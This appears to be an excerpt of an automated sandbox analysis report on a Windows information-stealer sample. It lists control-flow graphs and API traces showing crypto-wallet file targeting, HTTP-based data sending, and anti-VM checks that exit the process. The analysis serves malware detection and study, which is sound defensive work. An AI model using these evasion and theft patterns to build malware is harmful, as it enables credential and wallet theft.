                                        • GetProcAddress.KERNEL32(6D900000,01A76358), ref: 00E2A9DD
                                        • GetProcAddress.KERNEL32(6D900000,01A8D3F0), ref: 00E2A9F5
                                        • GetProcAddress.KERNEL32(6D900000,01A8D450), ref: 00E2AA0D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad
                                        • String ID: HttpQueryInfoA$InternetSetOptionA
                                        • API String ID: 2238633743-1775429166
                                        • Opcode ID: 2ce2ec86cd326e8e0f390af4be992833431f169ec6629df15bb025694888a32c
                                        • Instruction ID: d237ed173dd5dfb64cc892abd2b36ee81bb740d8b28ff38998d6b5eba20d352a
                                        • Opcode Fuzzy Hash: 2ce2ec86cd326e8e0f390af4be992833431f169ec6629df15bb025694888a32c
                                        • Instruction Fuzzy Hash: A46220B55002009FC374DFAAF88895677FAE79DF01710859AFA89CB258D73FA541CBA0

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 801 e148d0-e14992 call e2aab0 call e14800 call e2aa50 * 5 InternetOpenA StrCmpCA 816 e14994 801->816 817 e1499b-e1499f 801->817 816->817 818 e149a5-e14b1d call e28cf0 call e2ac30 call e2abb0 call e2ab10 * 2 call e2acc0 call e2abb0 call e2ab10 call e2acc0 call e2abb0 call e2ab10 call e2ac30 call e2abb0 call e2ab10 call e2acc0 call e2abb0 call e2ab10 call e2acc0 call e2abb0 call e2ab10 call e2acc0 call e2ac30 call e2abb0 call e2ab10 * 2 InternetConnectA 817->818 819 e14f1b-e14f43 InternetCloseHandle call e2ade0 call e1a210 817->819 818->819 905 e14b23-e14b27 818->905 829 e14f82-e14ff2 call e28b20 * 2 call e2aab0 call e2ab10 * 8 819->829 830 e14f45-e14f7d call e2ab30 call e2acc0 call e2abb0 call e2ab10 819->830 830->829 906 e14b35 905->906 907 e14b29-e14b33 905->907 908 e14b3f-e14b72 HttpOpenRequestA 906->908 907->908 909 e14b78-e14e78 call e2acc0 call e2abb0 call e2ab10 call e2ac30 call e2abb0 call e2ab10 call e2acc0 call e2abb0 call e2ab10 call e2acc0 call e2abb0 call e2ab10 call e2acc0 call e2abb0 call e2ab10 call e2acc0 call e2abb0 call e2ab10 call e2ac30 call e2abb0 call e2ab10 call e2acc0 call e2abb0 call e2ab10 call e2acc0 call e2abb0 call e2ab10 call e2ac30 call e2abb0 call e2ab10 call e2acc0 call e2abb0 call e2ab10 call e2acc0 call e2abb0 call e2ab10 call e2acc0 call e2abb0 call e2ab10 call e2acc0 call e2abb0 call e2ab10 call e2ac30 call e2abb0 call e2ab10 call e2aa50 call e2ac30 * 2 call e2abb0 call e2ab10 * 2 call e2ade0 lstrlen call e2ade0 * 2 lstrlen call e2ade0 HttpSendRequestA 908->909 910 e14f0e-e14f15 InternetCloseHandle 908->910 1021 e14e82-e14eac InternetReadFile 909->1021 910->819 1022 e14eb7-e14f09 InternetCloseHandle call e2ab10 1021->1022 1023 e14eae-e14eb5 1021->1023 1022->910 1023->1022 1024 e14eb9-e14ef7 call e2acc0 call e2abb0 call e2ab10 1023->1024 1024->1021
                                        APIs
                                          • Part of subcall function 00E2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E2AAF6
                                          • Part of subcall function 00E14800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E14889
                                          • Part of subcall function 00E14800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E14899
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00E14965
                                        • StrCmpCA.SHLWAPI(?,01A8F1A8), ref: 00E1498A
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E14B0A
                                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00E30DDE,00000000,?,?,00000000,?,",00000000,?,01A8F2C8), ref: 00E14E38
                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00E14E54
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00E14E68
                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00E14E99
                                        • InternetCloseHandle.WININET(00000000), ref: 00E14EFD
                                        • InternetCloseHandle.WININET(00000000), ref: 00E14F15
                                        • HttpOpenRequestA.WININET(00000000,01A8F2D8,?,01A8EB30,00000000,00000000,00400100,00000000), ref: 00E14B65
                                          • Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
                                          • Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
                                          • Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                          • Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
                                          • Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92
                                        • InternetCloseHandle.WININET(00000000), ref: 00E14F1F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                        • String ID: "$"$------$------$------
                                        • API String ID: 460715078-2180234286
                                        • Opcode ID: d02bdf0c6dc2fbc132eaf7710aab37a6df0e4dee8f49ce58ab4a45a736e64356
                                        • Instruction ID: 9847cd5dfe82dcf3c131807eba3c2c2e3357eddfe7184b48df0f8e8d82d9cfa8
                                        • Opcode Fuzzy Hash: d02bdf0c6dc2fbc132eaf7710aab37a6df0e4dee8f49ce58ab4a45a736e64356
                                        • Instruction Fuzzy Hash: 5612FC72910228ABCB15EB90ED62FEEB7B9BF14300F4855A9F10676191DF306F48CB61

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1090 e25760-e257c7 call e25d20 call e2ab30 * 3 call e2aa50 * 4 1106 e257cc-e257d3 1090->1106 1107 e25827-e2589c call e2aa50 * 2 call e11590 call e25510 call e2abb0 call e2ab10 call e2ade0 StrCmpCA 1106->1107 1108 e257d5-e25806 call e2ab30 call e2aab0 call e11590 call e25440 1106->1108 1134 e258e3-e258f9 call e2ade0 StrCmpCA 1107->1134 1138 e2589e-e258de call e2aab0 call e11590 call e25440 call e2abb0 call e2ab10 1107->1138 1123 e2580b-e25822 call e2abb0 call e2ab10 1108->1123 1123->1134 1139 e258ff-e25906 1134->1139 1140 e25a2c-e25a94 call e2abb0 call e2ab30 * 2 call e116b0 call e2ab10 * 4 call e11670 call e11550 1134->1140 1138->1134 1142 e25a2a-e25aaf call e2ade0 StrCmpCA 1139->1142 1143 e2590c-e25913 1139->1143 1271 e25d13-e25d16 1140->1271 1161 e25be1-e25c49 call e2abb0 call e2ab30 * 2 call e116b0 call e2ab10 * 4 call e11670 call e11550 1142->1161 1162 e25ab5-e25abc 1142->1162 1146 e25915-e25969 call e2ab30 call e2aab0 call e11590 call e25440 call e2abb0 call e2ab10 1143->1146 1147 e2596e-e259e3 call e2aa50 * 2 call e11590 call e25510 call e2abb0 call e2ab10 call e2ade0 StrCmpCA 1143->1147 1146->1142 1147->1142 1250 e259e5-e25a25 call e2aab0 call e11590 call e25440 call e2abb0 call e2ab10 1147->1250 1161->1271 1168 e25ac2-e25ac9 1162->1168 1169 e25bdf-e25c64 call e2ade0 StrCmpCA 1162->1169 1175 e25b23-e25b98 call e2aa50 * 2 call e11590 call e25510 call e2abb0 call e2ab10 call e2ade0 StrCmpCA 1168->1175 1176 e25acb-e25b1e call e2ab30 call e2aab0 call e11590 call e25440 call e2abb0 call e2ab10 1168->1176 1198 e25c66-e25c71 Sleep 1169->1198 1199 e25c78-e25ce1 call e2abb0 call e2ab30 * 2 call e116b0 call e2ab10 * 4 call e11670 call e11550 1169->1199 1175->1169 1274 e25b9a-e25bda call e2aab0 call e11590 call e25440 call e2abb0 call e2ab10 1175->1274 1176->1169 1198->1106 1199->1271 1250->1142 1274->1169
                                        APIs
                                          • Part of subcall function 00E2AB30: lstrlen.KERNEL32(UO,?,?,00E14F55,00E30DDF), ref: 00E2AB3B
                                          • Part of subcall function 00E2AB30: lstrcpy.KERNEL32(00E30DDF,00000000), ref: 00E2AB95
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E25894
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E258F1
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E25AA7
                                          • Part of subcall function 00E2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E2AAF6
                                          • Part of subcall function 00E25440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E25478
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                          • Part of subcall function 00E25510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E25568
                                          • Part of subcall function 00E25510: lstrlen.KERNEL32(00000000), ref: 00E2557F
                                          • Part of subcall function 00E25510: StrStrA.SHLWAPI(00000000,00000000), ref: 00E255B4
                                          • Part of subcall function 00E25510: lstrlen.KERNEL32(00000000), ref: 00E255D3
                                          • Part of subcall function 00E25510: lstrlen.KERNEL32(00000000), ref: 00E255FE
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E259DB
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E25B90
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E25C5C
                                        • Sleep.KERNEL32(0000EA60), ref: 00E25C6B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpylstrlen$Sleep
                                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                        • API String ID: 507064821-2791005934
                                        • Opcode ID: 9316ed9ce317fe62ccbf5908f3f8b4effa80f6739df58a7be3cf784afb2138f6
                                        • Instruction ID: 73d632e75e47e086a0a0306a02d984dac94843be862ffcdebdbaf22d85fe780e
                                        • Opcode Fuzzy Hash: 9316ed9ce317fe62ccbf5908f3f8b4effa80f6739df58a7be3cf784afb2138f6
                                        • Instruction Fuzzy Hash: 2EE160729101189BCB18FBA0F967AFD73BDAF54300F44A568F50776085EF356A48CBA2

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1301 e219f0-e21a1d call e2ade0 StrCmpCA 1304 e21a27-e21a41 call e2ade0 1301->1304 1305 e21a1f-e21a21 ExitProcess 1301->1305 1309 e21a44-e21a48 1304->1309 1310 e21c12-e21c1d call e2ab10 1309->1310 1311 e21a4e-e21a61 1309->1311 1312 e21a67-e21a6a 1311->1312 1313 e21bee-e21c0d 1311->1313 1315 e21b82-e21b93 StrCmpCA 1312->1315 1316 e21b63-e21b74 StrCmpCA 1312->1316 1317 e21bc0-e21bd1 StrCmpCA 1312->1317 1318 e21b41-e21b52 StrCmpCA 1312->1318 1319 e21ba1-e21bb2 StrCmpCA 1312->1319 1320 e21a85-e21a94 call e2ab30 1312->1320 1321 e21acf-e21ae0 StrCmpCA 1312->1321 1322 e21aad-e21abe StrCmpCA 1312->1322 1323 e21a71-e21a80 call e2ab30 1312->1323 1324 e21a99-e21aa8 call e2ab30 1312->1324 1325 e21b1f-e21b30 StrCmpCA 1312->1325 1326 e21bdf-e21be9 call e2ab30 1312->1326 1327 e21afd-e21b0e StrCmpCA 1312->1327 1313->1309 1350 e21b95-e21b98 1315->1350 1351 e21b9f 1315->1351 1348 e21b80 1316->1348 1349 e21b76-e21b79 1316->1349 1332 e21bd3-e21bd6 1317->1332 1333 e21bdd 1317->1333 1346 e21b54-e21b57 1318->1346 1347 e21b5e 1318->1347 1329 e21bb4-e21bb7 1319->1329 1330 e21bbe 1319->1330 1320->1313 1340 e21ae2-e21aec 1321->1340 1341 e21aee-e21af1 1321->1341 1338 e21ac0-e21ac3 1322->1338 1339 e21aca 1322->1339 1323->1313 1324->1313 1344 e21b32-e21b35 1325->1344 1345 e21b3c 1325->1345 1326->1313 1342 e21b10-e21b13 1327->1342 1343 e21b1a 1327->1343 1329->1330 1330->1313 1332->1333 1333->1313 1338->1339 1339->1313 1355 e21af8 1340->1355 1341->1355 1342->1343 1343->1313 1344->1345 1345->1313 1346->1347 1347->1313 1348->1313 1349->1348 1350->1351 1351->1313 1355->1313
                                        APIs
                                        • StrCmpCA.SHLWAPI(00000000,block), ref: 00E21A15
                                        • ExitProcess.KERNEL32 ref: 00E21A21
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess
                                        • String ID: block
                                        • API String ID: 621844428-2199623458
                                        • Opcode ID: 6741eebcd0673a1266b5610ac9f37f970f47aa82796186c1e4ac374ea485f2ad
                                        • Instruction ID: f8b19dee29f4feaa744624fb9347d3328d39f0545d5008a89d6819a7a1c04aab
                                        • Opcode Fuzzy Hash: 6741eebcd0673a1266b5610ac9f37f970f47aa82796186c1e4ac374ea485f2ad
                                        • Instruction Fuzzy Hash: 68515B78A08219EFCB14DF94E958AEE77B9EF54704F60509CE402BB240E775EA41CB61

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00E29BB0: GetProcAddress.KERNEL32(77190000,01A814B0), ref: 00E29BF1
                                          • Part of subcall function 00E29BB0: GetProcAddress.KERNEL32(77190000,01A81750), ref: 00E29C0A
                                          • Part of subcall function 00E29BB0: GetProcAddress.KERNEL32(77190000,01A81468), ref: 00E29C22
                                          • Part of subcall function 00E29BB0: GetProcAddress.KERNEL32(77190000,01A81588), ref: 00E29C3A
                                          • Part of subcall function 00E29BB0: GetProcAddress.KERNEL32(77190000,01A81498), ref: 00E29C53
                                          • Part of subcall function 00E29BB0: GetProcAddress.KERNEL32(77190000,01A88958), ref: 00E29C6B
                                          • Part of subcall function 00E29BB0: GetProcAddress.KERNEL32(77190000,01A767B8), ref: 00E29C83
                                          • Part of subcall function 00E29BB0: GetProcAddress.KERNEL32(77190000,01A765F8), ref: 00E29C9C
                                          • Part of subcall function 00E29BB0: GetProcAddress.KERNEL32(77190000,01A814E0), ref: 00E29CB4
                                          • Part of subcall function 00E29BB0: GetProcAddress.KERNEL32(77190000,01A815E8), ref: 00E29CCC
                                          • Part of subcall function 00E29BB0: GetProcAddress.KERNEL32(77190000,01A814F8), ref: 00E29CE5
                                          • Part of subcall function 00E29BB0: GetProcAddress.KERNEL32(77190000,01A81510), ref: 00E29CFD
                                          • Part of subcall function 00E29BB0: GetProcAddress.KERNEL32(77190000,01A766F8), ref: 00E29D15
                                          • Part of subcall function 00E29BB0: GetProcAddress.KERNEL32(77190000,01A81540), ref: 00E29D2E
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                          • Part of subcall function 00E111D0: ExitProcess.KERNEL32 ref: 00E11211
                                          • Part of subcall function 00E11160: GetSystemInfo.KERNEL32(?), ref: 00E1116A
                                          • Part of subcall function 00E11160: ExitProcess.KERNEL32 ref: 00E1117E
                                          • Part of subcall function 00E11110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00E1112B
                                          • Part of subcall function 00E11110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00E11132
                                          • Part of subcall function 00E11110: ExitProcess.KERNEL32 ref: 00E11143
                                          • Part of subcall function 00E11220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00E1123E
                                          • Part of subcall function 00E11220: __aulldiv.LIBCMT ref: 00E11258
                                          • Part of subcall function 00E11220: __aulldiv.LIBCMT ref: 00E11266
                                          • Part of subcall function 00E11220: ExitProcess.KERNEL32 ref: 00E11294
                                          • Part of subcall function 00E26A10: GetUserDefaultLangID.KERNEL32 ref: 00E26A14
                                          • Part of subcall function 00E11190: ExitProcess.KERNEL32 ref: 00E111C6
                                          • Part of subcall function 00E279E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00E111B7), ref: 00E27A10
                                          • Part of subcall function 00E279E0: RtlAllocateHeap.NTDLL(00000000), ref: 00E27A17
                                          • Part of subcall function 00E279E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00E27A2F
                                          • Part of subcall function 00E27A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E27AA0
                                          • Part of subcall function 00E27A70: RtlAllocateHeap.NTDLL(00000000), ref: 00E27AA7
                                          • Part of subcall function 00E27A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00E27ABF
                                          • Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
                                          • Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
                                          • Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01A88938,?,00E310F4,?,00000000,?,00E310F8,?,00000000,00E30AF3), ref: 00E26D6A
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E26D88
                                        • CloseHandle.KERNEL32(00000000), ref: 00E26D99
                                        • Sleep.KERNEL32(00001770), ref: 00E26DA4
                                        • CloseHandle.KERNEL32(?,00000000,?,01A88938,?,00E310F4,?,00000000,?,00E310F8,?,00000000,00E30AF3), ref: 00E26DBA
                                        • ExitProcess.KERNEL32 ref: 00E26DC2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                        • String ID:
                                        • API String ID: 2525456742-0
                                        • Opcode ID: ffedaffd8130eef70bb00fbde1646e94bfb2194c9388fd0992db15bc52d924a3
                                        • Instruction ID: eb7475a131fb2e341cb550e87fd07282f111d1b92120dee14747359ea979cb73
                                        • Opcode Fuzzy Hash: ffedaffd8130eef70bb00fbde1646e94bfb2194c9388fd0992db15bc52d924a3
                                        • Instruction Fuzzy Hash: D5310C71A00228ABCB04F7F0EC57AEEB7F9AF04740F586968F51276182DF746945C762

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1436 e11220-e11247 call e28b40 GlobalMemoryStatusEx 1439 e11273-e1127a 1436->1439 1440 e11249-e11271 call e2dd30 * 2 1436->1440 1441 e11281-e11285 1439->1441 1440->1441 1443 e11287 1441->1443 1444 e1129a-e1129d 1441->1444 1446 e11292-e11294 ExitProcess 1443->1446 1447 e11289-e11290 1443->1447 1447->1444 1447->1446
                                        APIs
                                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00E1123E
                                        • __aulldiv.LIBCMT ref: 00E11258
                                        • __aulldiv.LIBCMT ref: 00E11266
                                        • ExitProcess.KERNEL32 ref: 00E11294
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
